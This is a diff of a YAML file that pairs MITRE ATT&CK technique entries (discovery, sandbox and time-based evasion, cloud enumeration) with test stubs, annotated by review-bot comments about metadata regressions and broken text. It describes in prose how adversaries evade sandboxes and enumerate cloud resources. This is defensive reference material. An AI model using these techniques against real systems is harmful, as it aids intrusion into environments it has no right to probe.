- kill_chain_name: mitre-attack
phase_name: discovery
+ x_mitre_deprecated: false
x_mitre_detection: |-
System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Lateral Movement, based on the information obtained.
Monitor processes and command-line arguments for actions that could be taken to gather system and network information. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '1.1'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - Windows
+ - Office Suite
+ x_mitre_version: '1.2'
x_mitre_data_sources:
- 'Process: Process Creation'
- 'Command: Command Execution'
- x_mitre_permissions_required:
- - User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
- atomic_tests: []
- T1497.003:
- technique:
- x_mitre_platforms:
- - Linux
- - macOS
- - Windows
- x_mitre_domains:
- - enterprise-attack
- x_mitre_contributors:
- - Jorge Orchilles, SCYTHE
- - Ruben Dodge, @shotgunner101
- - Jeff Felling, Red Canary
- - Deloitte Threat Library Team
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--4bed873f-0b7d-41d4-b93a-b6905d1f90b0
type: attack-pattern
- created: '2020-03-06T21:11:11.225Z'
+ id: attack-pattern--4bc31b94-045b-4752-8920-aebaebdb6470
+ created: '2020-02-21T21:08:33.237Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
external_references:
- source_name: mitre-attack
- external_id: T1497.003
- url: https://attack.mitre.org/techniques/T1497/003
- - source_name: Deloitte Environment Awareness
- url: https://drive.google.com/file/d/1t0jn3xr4ff2fR30oQAUn_RsWSnMpOAQc
- description: Torello, A. & Guibernau, F. (n.d.). Environment Awareness. Retrieved
- May 18, 2021.
- - source_name: Revil Independence Day
- url: https://news.sophos.com/en-us/2021/07/04/independence-day-revil-uses-supply-chain-exploit-to-attack-hundreds-of-businesses/
- description: 'Loman, M. et al. (2021, July 4). Independence Day: REvil uses
- supply chain exploit to attack hundreds of businesses. Retrieved September
- 30, 2021.'
- - source_name: Netskope Nitol
- url: https://www.netskope.com/blog/nitol-botnet-makes-resurgence-evasive-sandbox-analysis-technique
- description: Malik, A. (2016, October 14). Nitol Botnet makes a resurgence
- with evasive sandbox analysis technique. Retrieved September 30, 2021.
- - source_name: Joe Sec Nymaim
- url: https://www.joesecurity.org/blog/3660886847485093803
- description: Joe Security. (2016, April 21). Nymaim - evading Sandboxes with
- API hammering. Retrieved September 30, 2021.
- - source_name: Joe Sec Trickbot
- url: https://www.joesecurity.org/blog/498839998833561473
- description: Joe Security. (2020, July 13). TrickBot's new API-Hammering explained.
- Retrieved September 30, 2021.
- - source_name: ISACA Malware Tricks
- url: https://www.isaca.org/resources/isaca-journal/issues/2017/volume-6/evasive-malware-tricks-how-malware-evades-detection-by-sandboxes
- description: 'Kolbitsch, C. (2017, November 1). Evasive Malware Tricks: How
- Malware Evades Detection by Sandboxes. Retrieved March 30, 2021.'
- modified: '2022-05-11T14:00:00.188Z'
+ url: https://attack.mitre.org/techniques/T1087/003
+ external_id: T1087.003
+ - source_name: Black Hills Attacking Exchange MailSniper, 2016
+ description: Bullock, B.. (2016, October 3). Attacking Exchange with MailSniper.
+ Retrieved October 6, 2019.
+ url: https://www.blackhillsinfosec.com/attacking-exchange-with-mailsniper/
+ - source_name: Google Workspace Global Access List
+ description: Google. (n.d.). Retrieved March 16, 2021.
+ url: https://support.google.com/a/answer/166870?hl=en
+ - source_name: Microsoft Exchange Address Lists
+ description: Microsoft. (2020, February 7). Address lists in Exchange Server.
+ Retrieved March 26, 2020.
+ url: https://docs.microsoft.com/en-us/exchange/email-addresses-and-address-books/address-lists/address-lists?view=exchserver-2019
+ - source_name: Microsoft getglobaladdresslist
+ description: Microsoft. (n.d.). Get-GlobalAddressList. Retrieved October 6,
+ 2019.
+ url: https://docs.microsoft.com/en-us/powershell/module/exchange/email-addresses-and-address-books/get-globaladdresslist
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ atomic_tests: []
+ T1497.003:
+ technique:
+ modified: '2024-09-12T15:50:18.048Z'
name: Time Based Evasion
description: |-
Adversaries may employ various time-based methods to detect and avoid virtualization and analysis environments. This may include enumerating time-based properties, such as uptime or the system clock, as well as the use of timers or other triggers to avoid a virtual machine environment (VME) or sandbox, specifically those that are automated or only operate for a limited amount of time.
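Review bot: `spec_version: '2.1'` is dropped from every technique object in this patch (first at the `- spec_version: '2.1'` line of this hunk, then again for T1497.003, T1580, T1217, T1016, T1087, T1482, T1083, T1049 and T1619) while `x_mitre_attack_spec_version` is bumped to 3.2.0; STIX 2.1 objects carry `spec_version`, so either the generator should keep it or the commit message should say the field is intentionally gone so consumers of this YAML can adjust. Separately, the regeneration reorders keys inside each technique (`modified`, `name`, `description` now lead, `type`/`id`/`created` move to the end), which makes this hunk read as if T1497.003 were deleted and re-added when only Email Account's reference list and platforms actually changed; a stable key order in the generator would keep future diffs reviewable.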
@@ -55561,6 +56209,12 @@ discovery:
phase_name: defense-evasion
- kill_chain_name: mitre-attack
phase_name: discovery
+ x_mitre_contributors:
+ - Jorge Orchilles, SCYTHE
+ - Ruben Dodge, @shotgunner101
+ - Jeff Felling, Red Canary
+ - Deloitte Threat Library Team
+ x_mitre_deprecated: false
x_mitre_detection: 'Time-based evasion will likely occur in the first steps
of an operation but may also occur throughout as an adversary learns the environment.
Data and events should not be viewed in isolation, but as part of a chain
@@ -55570,9 +56224,14 @@ discovery:
implementation and monitoring required. Monitoring for suspicious processes
being spawned that gather a variety of system information or perform other
forms of Discovery, especially in a short period of time, may aid in detection. '
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ - Windows
x_mitre_version: '1.2'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_data_sources:
- 'Process: OS API Execution'
- 'Process: Process Creation'
@@ -55582,8 +56241,44 @@ discovery:
- Signature-based detection
- Static File Analysis
- Anti-virus
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--4bed873f-0b7d-41d4-b93a-b6905d1f90b0
+ created: '2020-03-06T21:11:11.225Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1497/003
+ external_id: T1497.003
+ - source_name: Joe Sec Nymaim
+ description: Joe Security. (2016, April 21). Nymaim - evading Sandboxes with
+ API hammering. Retrieved September 30, 2021.
+ url: https://www.joesecurity.org/blog/3660886847485093803
+ - source_name: Joe Sec Trickbot
+ description: Joe Security. (2020, July 13). TrickBot's new API-Hammering explained.
+ Retrieved September 30, 2021.
+ url: https://www.joesecurity.org/blog/498839998833561473
+ - source_name: ISACA Malware Tricks
+ description: 'Kolbitsch, C. (2017, November 1). Evasive Malware Tricks: How
+ Malware Evades Detection by Sandboxes. Retrieved March 30, 2021.'
+ url: https://www.isaca.org/resources/isaca-journal/issues/2017/volume-6/evasive-malware-tricks-how-malware-evades-detection-by-sandboxes
+ - source_name: Revil Independence Day
+ description: 'Loman, M. et al. (2021, July 4). Independence Day: REvil uses
+ supply chain exploit to attack hundreds of businesses. Retrieved September
+ 30, 2021.'
+ url: https://news.sophos.com/en-us/2021/07/04/independence-day-revil-uses-supply-chain-exploit-to-attack-hundreds-of-businesses/
+ - source_name: Netskope Nitol
+ description: Malik, A. (2016, October 14). Nitol Botnet makes a resurgence
+ with evasive sandbox analysis technique. Retrieved September 30, 2021.
+ url: https://www.netskope.com/blog/nitol-botnet-makes-resurgence-evasive-sandbox-analysis-technique
+ - source_name: Deloitte Environment Awareness
+ description: Torello, A. & Guibernau, F. (n.d.). Environment Awareness. Retrieved
+ September 13, 2024.
+ url: https://drive.google.com/file/d/1t0jn3xr4ff2fR30oQAUn_RsWSnMpOAQc/edit
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1497.003
atomic_tests:
- name: Delay execution with ping
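Review bot: the `Deloitte Environment Awareness` reference now points at `https://drive.google.com/file/d/1t0jn3xr4ff2fR30oQAUn_RsWSnMpOAQc/edit` (retrieved September 13, 2024) instead of the bare file URL used on the removed side; `/edit` is the Drive editor form of the link rather than a plain share link, so confirm it resolves for anonymous readers before merging (the same URL change appears in the T1497 entry later in the patch). The remaining changes in this hunk are the `url`/`description` key swap and reference reordering from the regeneration.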
@@ -55612,91 +56307,90 @@ discovery:
name: sh
T1580:
technique:
- x_mitre_platforms:
- - IaaS
- x_mitre_domains:
- - enterprise-attack
+ modified: '2024-09-30T13:28:37.415Z'
+ name: Cloud Infrastructure Discovery
+ description: |-
+ An adversary may attempt to discover infrastructure and resources that are available within an infrastructure-as-a-service (IaaS) environment. This includes compute service resources such as instances, virtual machines, and snapshots as well as resources of other services including the storage and database services.
+
+ Cloud providers offer methods such as APIs and commands issued through CLIs to serve information about infrastructure. For example, AWS provides a DescribeInstances
API within the Amazon EC2 API that can return information about one or more instances within an account, the ListBuckets
API that returns a list of all buckets owned by the authenticated sender of the request, the HeadBucket
API to determine a bucket’s existence along with access permissions of the request sender, or the GetPublicAccessBlock
API to retrieve access block configuration for a bucket.(Citation: Amazon Describe Instance)(Citation: Amazon Describe Instances API)(Citation: AWS Get Public Access Block)(Citation: AWS Head Bucket) Similarly, GCP's Cloud SDK CLI provides the gcloud compute instances list
command to list all Google Compute Engine instances in a project (Citation: Google Compute Instances), and Azure's CLI command az vm list
lists details of virtual machines.(Citation: Microsoft AZ CLI) In addition to API commands, adversaries can utilize open source tools to discover cloud storage infrastructure through [Wordlist Scanning](https://attack.mitre.org/techniques/T1595/003).(Citation: Malwarebytes OSINT Leaky Buckets - Hioureas)
+
+ An adversary may enumerate resources using a compromised user's access keys to determine which are available to that user.(Citation: Expel IO Evil in AWS) The discovery of these available resources may help adversaries determine their next steps in the Cloud environment, such as establishing Persistence.(Citation: Mandiant M-Trends 2020)An adversary may also use this information to change the configuration to make the bucket publicly accessible, allowing data to be accessed without authentication. Adversaries have also may use infrastructure discovery APIs such as DescribeDBInstances
to determine size, owner, permissions, and network ACLs of database resources. (Citation: AWS Describe DB Instances) Adversaries can use this information to determine the potential value of databases and discover the requirements to access them. Unlike in [Cloud Service Discovery](https://attack.mitre.org/techniques/T1526), this technique focuses on the discovery of components of the provided services rather than the services themselves.
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: discovery
x_mitre_contributors:
- Regina Elwell
- Praetorian
- Isif Ibrahima, Mandiant
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_deprecated: false
+ x_mitre_detection: Establish centralized logging for the activity of cloud infrastructure
+ components. Monitor logs for actions that could be taken to gather information
+ about cloud infrastructure, including the use of discovery API calls by new
+ or unexpected users and enumerations from unknown or malicious IP addresses.
+ To reduce false positives, valid change management procedures could introduce
+ a known identifier that is logged with the change (e.g., tag or header) if
+ supported by the cloud provider, to help distinguish valid, expected actions
+ from malicious ones.
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: false
+ x_mitre_platforms:
+ - IaaS
+ x_mitre_version: '1.3'
+ x_mitre_data_sources:
+ - 'Instance: Instance Enumeration'
+ - 'Cloud Storage: Cloud Storage Enumeration'
+ - 'Volume: Volume Enumeration'
+ - 'Snapshot: Snapshot Enumeration'
type: attack-pattern
id: attack-pattern--57a3d31a-d04f-4663-b2da-7df8ec3f8c9d
created: '2020-08-20T17:51:25.671Z'
- x_mitre_version: '1.3'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
external_references:
- source_name: mitre-attack
- external_id: T1580
url: https://attack.mitre.org/techniques/T1580
+ external_id: T1580
- source_name: Expel IO Evil in AWS
- url: https://expel.io/blog/finding-evil-in-aws/
description: A. Randazzo, B. Manahan and S. Lipton. (2020, April 28). Finding
Evil in AWS. Retrieved June 25, 2020.
+ url: https://expel.io/blog/finding-evil-in-aws/
- source_name: AWS Head Bucket
- url: https://docs.aws.amazon.com/AmazonS3/latest/API/API_HeadBucket.html
description: Amazon Web Services. (n.d.). AWS HeadBucket. Retrieved February
14, 2022.
+ url: https://docs.aws.amazon.com/AmazonS3/latest/API/API_HeadBucket.html
- source_name: AWS Get Public Access Block
- url: https://docs.aws.amazon.com/AmazonS3/latest/API/API_GetPublicAccessBlock.html
description: Amazon Web Services. (n.d.). Retrieved May 28, 2021.
+ url: https://docs.aws.amazon.com/AmazonS3/latest/API/API_GetPublicAccessBlock.html
- source_name: AWS Describe DB Instances
- url: https://docs.aws.amazon.com/AmazonRDS/latest/APIReference/API_DescribeDBInstances.html
description: Amazon Web Services. (n.d.). Retrieved May 28, 2021.
+ url: https://docs.aws.amazon.com/AmazonRDS/latest/APIReference/API_DescribeDBInstances.html
- source_name: Amazon Describe Instance
- url: https://docs.aws.amazon.com/cli/latest/reference/ssm/describe-instance-information.html
description: Amazon. (n.d.). describe-instance-information. Retrieved March
3, 2020.
+ url: https://docs.aws.amazon.com/cli/latest/reference/ssm/describe-instance-information.html
- source_name: Amazon Describe Instances API
- url: https://docs.aws.amazon.com/AWSEC2/latest/APIReference/API_DescribeInstances.html
description: Amazon. (n.d.). DescribeInstances. Retrieved May 26, 2020.
+ url: https://docs.aws.amazon.com/AWSEC2/latest/APIReference/API_DescribeInstances.html
- source_name: Google Compute Instances
- url: https://cloud.google.com/sdk/gcloud/reference/compute/instances/list
description: Google. (n.d.). gcloud compute instances list. Retrieved May
26, 2020.
+ url: https://cloud.google.com/sdk/gcloud/reference/compute/instances/list
- source_name: Mandiant M-Trends 2020
- url: https://content.fireeye.com/m-trends/rpt-m-trends-2020
description: Mandiant. (2020, February). M-Trends 2020. Retrieved April 24,
2020.
+ url: https://www.mandiant.com/sites/default/files/2021-09/mtrends-2020.pdf
- source_name: Microsoft AZ CLI
- url: https://docs.microsoft.com/en-us/cli/azure/ad/user?view=azure-cli-latest
description: Microsoft. (n.d.). az ad user. Retrieved October 6, 2019.
+ url: https://docs.microsoft.com/en-us/cli/azure/ad/user?view=azure-cli-latest
- source_name: Malwarebytes OSINT Leaky Buckets - Hioureas
- url: https://blog.malwarebytes.com/researchers-corner/2019/09/hacking-with-aws-incorporating-leaky-buckets-osint-workflow/
description: 'Vasilios Hioureas. (2019, September 13). Hacking with AWS: incorporating
leaky buckets into your OSINT workflow. Retrieved February 14, 2022.'
- x_mitre_deprecated: false
- revoked: false
- description: |-
- An adversary may attempt to discover infrastructure and resources that are available within an infrastructure-as-a-service (IaaS) environment. This includes compute service resources such as instances, virtual machines, and snapshots as well as resources of other services including the storage and database services.
-
- Cloud providers offer methods such as APIs and commands issued through CLIs to serve information about infrastructure. For example, AWS provides a DescribeInstances
API within the Amazon EC2 API that can return information about one or more instances within an account, the ListBuckets
API that returns a list of all buckets owned by the authenticated sender of the request, the HeadBucket
API to determine a bucket’s existence along with access permissions of the request sender, or the GetPublicAccessBlock
API to retrieve access block configuration for a bucket.(Citation: Amazon Describe Instance)(Citation: Amazon Describe Instances API)(Citation: AWS Get Public Access Block)(Citation: AWS Head Bucket) Similarly, GCP's Cloud SDK CLI provides the gcloud compute instances list
command to list all Google Compute Engine instances in a project (Citation: Google Compute Instances), and Azure's CLI command az vm list
lists details of virtual machines.(Citation: Microsoft AZ CLI) In addition to API commands, adversaries can utilize open source tools to discover cloud storage infrastructure through [Wordlist Scanning](https://attack.mitre.org/techniques/T1595/003).(Citation: Malwarebytes OSINT Leaky Buckets - Hioureas)
-
- An adversary may enumerate resources using a compromised user's access keys to determine which are available to that user.(Citation: Expel IO Evil in AWS) The discovery of these available resources may help adversaries determine their next steps in the Cloud environment, such as establishing Persistence.(Citation: Mandiant M-Trends 2020)An adversary may also use this information to change the configuration to make the bucket publicly accessible, allowing data to be accessed without authentication. Adversaries have also may use infrastructure discovery APIs such as DescribeDBInstances
to determine size, owner, permissions, and network ACLs of database resources. (Citation: AWS Describe DB Instances) Adversaries can use this information to determine the potential value of databases and discover the requirements to access them. Unlike in [Cloud Service Discovery](https://attack.mitre.org/techniques/T1526), this technique focuses on the discovery of components of the provided services rather than the services themselves.
- modified: '2022-05-11T14:00:00.188Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- name: Cloud Infrastructure Discovery
- x_mitre_detection: Establish centralized logging for the activity of cloud infrastructure
- components. Monitor logs for actions that could be taken to gather information
- about cloud infrastructure, including the use of discovery API calls by new
- or unexpected users and enumerations from unknown or malicious IP addresses.
- To reduce false positives, valid change management procedures could introduce
- a known identifier that is logged with the change (e.g., tag or header) if
- supported by the cloud provider, to help distinguish valid, expected actions
- from malicious ones.
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: discovery
- x_mitre_is_subtechnique: false
- x_mitre_data_sources:
- - 'Instance: Instance Enumeration'
- - 'Cloud Storage: Cloud Storage Enumeration'
- - 'Volume: Volume Enumeration'
- - 'Snapshot: Snapshot Enumeration'
- x_mitre_attack_spec_version: 2.1.0
+ url: https://blog.malwarebytes.com/researchers-corner/2019/09/hacking-with-aws-incorporating-leaky-buckets-osint-workflow/
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1580
atomic_tests:
- name: AWS - EC2 Enumeration from Cloud Instance
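Review bot: the `Microsoft AZ CLI` reference still backs the `az vm list` sentence in the description, but its description and URL are for `az ad user` (`.../cli/azure/ad/user?view=azure-cli-latest`); since description and references are synced from upstream ATT&CK this should be fixed upstream rather than here, and the same goes for the missing space in `(Citation: Mandiant M-Trends 2020)An adversary` and the phrase `Adversaries have also may use`. The description also breaks mid-sentence after each API name (`DescribeInstances`, `ListBuckets`, `HeadBucket`, `GetPublicAccessBlock`, `gcloud compute instances list`, `az vm list`, `DescribeDBInstances`) on both the removed and added sides, which points at the generator stripping inline code markup rather than at this change. The Mandiant M-Trends URL moving from content.fireeye.com to the mandiant.com PDF is the one substantive fix in the hunk.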
@@ -55772,7 +56466,7 @@ discovery:
elevation_required: false
T1217:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-04-16T14:24:40.625Z'
name: Browser Bookmark Discovery
description: |-
Adversaries may enumerate information about browsers to learn more about compromised environments. Data saved by browsers (such as bookmarks, accounts, and browsing history) may reveal a variety of personal information about users (e.g., banking sites, relationships/interests, social media, etc.) as well as details about internal network resources such as servers, tools/dashboards, or other related infrastructure.(Citation: Kaspersky Autofill)
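Review bot: `modified` moves backwards here (`2023-05-09T14:00:00.188Z` to `2023-04-16T14:24:40.625Z`), and the same regression appears for T1482, T1049 and T1619 later in the patch; the old values all share the synthetic-looking `14:00:00.188Z` time, so the new ones are presumably the real upstream STIX timestamps, but anything that detects updates by comparing `modified` will see these entries as older and may skip them. A line in the commit message explaining the source change would save the next reader the same question.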
@@ -55826,7 +56520,6 @@ discovery:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1217
atomic_tests:
- name: List Mozilla Firefox Bookmark Database Files on macOS
@@ -55918,7 +56611,7 @@ discovery:
x_mitre_detection: |-
System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Lateral Movement, based on the information obtained.
- Monitor processes and command-line arguments for actions that could be taken to gather system and network information. Remote access tools with built-in features may interact directly with the Windows API to gather information. Further, (LinkById: T1059.008) commands may also be used to gather system and network information with built-in features native to the network device platform. Monitor CLI activity for unexpected or unauthorized use commands being run by non-standard users from non-standard locations. Information may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).
+ Monitor processes and command-line arguments for actions that could be taken to gather system and network information. Remote access tools with built-in features may interact directly with the Windows API to gather information. Further, {{LinkById|T1059.008} commands may also be used to gather system and network information with built-in features native to the network device platform. Monitor CLI activity for unexpected or unauthorized use commands being run by non-standard users from non-standard locations. Information may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: false
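Review bot: the replacement `{{LinkById|T1059.008}` in `x_mitre_detection` is unbalanced (two opening braces, one closing) and is an unrendered template token, whereas the other cross-references in the same sentence are plain markdown links to attack.mitre.org; render it in the same style, `[Network Device CLI](https://attack.mitre.org/techniques/T1059/008)`, or at minimum balance the braces, since as written the text will ship broken into any rendered view of the detection guidance.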
@@ -55956,7 +56649,6 @@ discovery:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1016
atomic_tests:
- name: System Network Configuration Discovery
@@ -56008,7 +56700,7 @@ discovery:
elevation_required: true
T1087:
technique:
- modified: '2024-01-12T23:36:56.245Z'
+ modified: '2024-10-15T15:35:28.784Z'
name: Account Discovery
description: |-
Adversaries may attempt to get a listing of valid accounts, usernames, or email addresses on a system or within a compromised environment. This information can help adversaries determine which accounts exist, which can aid in follow-on behavior such as brute-forcing, spear-phishing attacks, or account takeovers (e.g., [Valid Accounts](https://attack.mitre.org/techniques/T1078)).
@@ -56035,14 +56727,13 @@ discovery:
x_mitre_is_subtechnique: false
x_mitre_platforms:
- Windows
- - Azure AD
- - Office 365
- SaaS
- IaaS
- Linux
- macOS
- - Google Workspace
- x_mitre_version: '2.4'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '2.5'
x_mitre_data_sources:
- 'Process: Process Creation'
- 'Command: Command Execution'
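Review bot: the platform list swaps `Azure AD`, `Office 365` and `Google Workspace` for `Office Suite` and `Identity Provider` (Email Account earlier in the patch likewise gains `Office Suite`), matching the upstream ATT&CK platform consolidation; anything downstream keyed on the old platform names (per-platform indexes, filters, dashboards) needs regenerating in the same change or it will silently lose these techniques. The `x_mitre_version` bump from 2.4 to 2.5 is consistent with that upstream change.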
@@ -56071,7 +56762,6 @@ discovery:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1482:
technique:
@@ -56131,7 +56821,7 @@ discovery:
.NET methods, and LDAP.(Citation: Harmj0y Domain Trusts) The Windows utility
[Nltest](https://attack.mitre.org/software/S0359) is known to be used by adversaries
to enumerate domain trusts.(Citation: Microsoft Operation Wilysupply)'
- modified: '2022-11-08T14:00:00.188Z'
+ modified: '2022-06-16T19:18:22.305Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: Domain Trust Discovery
x_mitre_detection: |
@@ -56150,7 +56840,6 @@ discovery:
- 'Process: OS API Execution'
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1482
atomic_tests: []
T1083:
@@ -56219,7 +56908,6 @@ discovery:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1083
atomic_tests:
- name: Nix File and Directory Discovery
@@ -56278,7 +56966,7 @@ discovery:
name: sh
T1049:
technique:
- modified: '2022-11-08T14:00:00.188Z'
+ modified: '2022-09-06T22:35:34.231Z'
name: System Network Connections Discovery
description: "Adversaries may attempt to get a listing of network connections
to or from the compromised system they are currently accessing or from remote
@@ -56355,7 +57043,6 @@ discovery:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1049
atomic_tests:
- name: System Network Connections Discovery FreeBSD, Linux & MacOS
@@ -56386,35 +57073,7 @@ discovery:
name: sh
T1497:
technique:
- x_mitre_platforms:
- - Windows
- - macOS
- - Linux
- x_mitre_domains:
- - enterprise-attack
- x_mitre_contributors:
- - Deloitte Threat Library Team
- - Sunny Neo
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--82caa33e-d11a-433a-94ea-9b5a5fbef81d
- type: attack-pattern
- created: '2019-04-17T22:22:24.505Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1497
- url: https://attack.mitre.org/techniques/T1497
- - source_name: Deloitte Environment Awareness
- url: https://drive.google.com/file/d/1t0jn3xr4ff2fR30oQAUn_RsWSnMpOAQc
- description: Torello, A. & Guibernau, F. (n.d.). Environment Awareness. Retrieved
- May 18, 2021.
- - source_name: Unit 42 Pirpi July 2015
- url: https://unit42.paloaltonetworks.com/ups-observations-on-cve-2015-3113-prior-zero-days-and-the-pirpi-payload/
- description: 'Falcone, R., Wartell, R.. (2015, July 27). UPS: Observations
- on CVE-2015-3113, Prior Zero-Days and the Pirpi Payload. Retrieved April
- 23, 2019.'
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2024-09-12T15:50:18.049Z'
name: Virtualization/Sandbox Evasion
description: |+
Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.(Citation: Deloitte Environment Awareness)
@@ -56426,6 +57085,10 @@ discovery:
phase_name: defense-evasion
- kill_chain_name: mitre-attack
phase_name: discovery
+ x_mitre_contributors:
+ - Deloitte Threat Library Team
+ - Sunny Neo
+ x_mitre_deprecated: false
x_mitre_detection: Virtualization, sandbox, user activity, and related discovery
techniques will likely occur in the first steps of an operation but may also
occur throughout as an adversary learns the environment. Data and events should
@@ -56436,8 +57099,14 @@ discovery:
required. Monitoring for suspicious processes being spawned that gather a
variety of system information or perform other forms of Discovery, especially
in a short period of time, may aid in detection.
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: false
+ x_mitre_platforms:
+ - Windows
+ - macOS
+ - Linux
x_mitre_version: '1.3'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_data_sources:
- 'Command: Command Execution'
- 'Process: Process Creation'
@@ -56447,9 +57116,28 @@ discovery:
- Host forensic analysis
- Signature-based detection
- Static File Analysis
- x_mitre_is_subtechnique: false
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--82caa33e-d11a-433a-94ea-9b5a5fbef81d
+ created: '2019-04-17T22:22:24.505Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1497
+ external_id: T1497
+ - source_name: Unit 42 Pirpi July 2015
+ description: 'Falcone, R., Wartell, R.. (2015, July 27). UPS: Observations
+ on CVE-2015-3113, Prior Zero-Days and the Pirpi Payload. Retrieved April
+ 23, 2019.'
+ url: https://unit42.paloaltonetworks.com/ups-observations-on-cve-2015-3113-prior-zero-days-and-the-pirpi-payload/
+ - source_name: Deloitte Environment Awareness
+ description: Torello, A. & Guibernau, F. (n.d.). Environment Awareness. Retrieved
+ September 13, 2024.
+ url: https://drive.google.com/file/d/1t0jn3xr4ff2fR30oQAUn_RsWSnMpOAQc/edit
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1619:
technique:
@@ -56482,7 +57170,7 @@ discovery:
Adversaries may enumerate objects in cloud storage infrastructure. Adversaries may use this information during automated discovery to shape follow-on behaviors, including requesting all or specific objects from cloud storage. Similar to [File and Directory Discovery](https://attack.mitre.org/techniques/T1083) on a local host, after identifying available storage services (i.e. [Cloud Infrastructure Discovery](https://attack.mitre.org/techniques/T1580)) adversaries may access the contents/objects stored in cloud infrastructure.
